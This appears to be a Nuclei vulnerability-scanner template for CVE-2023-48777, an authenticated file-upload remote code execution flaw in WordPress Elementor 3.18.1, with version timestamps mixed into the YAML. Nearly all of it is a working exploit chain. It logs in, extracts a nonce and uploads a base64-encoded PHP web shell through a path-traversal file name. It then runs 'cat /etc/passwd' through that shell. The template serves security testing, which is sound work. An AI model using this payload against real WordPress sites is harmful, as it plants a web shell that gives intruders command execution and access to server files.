2024-02-22 06:20:52 +00:00
id : CVE-2023-48777
info :
2024-02-22 06:52:45 +00:00
name : WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
2024-02-22 06:20:52 +00:00
author : DhiyaneshDK
severity : critical
description : |
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
remediation : Fixed in 3.18.2
reference :
- https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
2024-06-07 10:04:29 +00:00
- https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score : 9.9
cve-id : CVE-2023-48777
cwe-id : CWE-434
epss-score : 0.00054
epss-percentile : 0.21518
2024-09-10 08:22:50 +00:00
cpe : cpe:2.3:a:elementor:website_builder:*:*:*:*:wordpress:*:*:*
2024-02-22 06:20:52 +00:00
metadata :
verified : true
2024-02-22 06:52:45 +00:00
max-request : 4
2024-02-22 06:20:52 +00:00
framework : wordpress
publicwww-query : "/wp-content/plugins/elementor/"
2024-09-10 08:22:50 +00:00
product : website_builder
vendor : elementor
2024-02-22 06:20:52 +00:00
tags : cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
variables :
filename : "{{rand_base(6)}}"
payload : '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'
http :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
2024-02-22 06:52:45 +00:00
Content-Type : application/x-www-form-urlencoded
2024-02-22 06:20:52 +00:00
actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
- |
GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- "regex('root:.*:0:0:', body_4)"
- "status_code_4 == 200"
condition : and
extractors :
- type : regex
internal : true
name : nonce
part : body
group : 1
regex :
- 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022100b3d8b25c92e7ab54e8cb62b3d79e4e6e3092cf2c52826a69391556080b19e1ed02205892c3846769266322a0c3fc634235e3a99ce58f003c1cf559ca26a336c7dc55:922c64590222798bb761d5b6d8e72950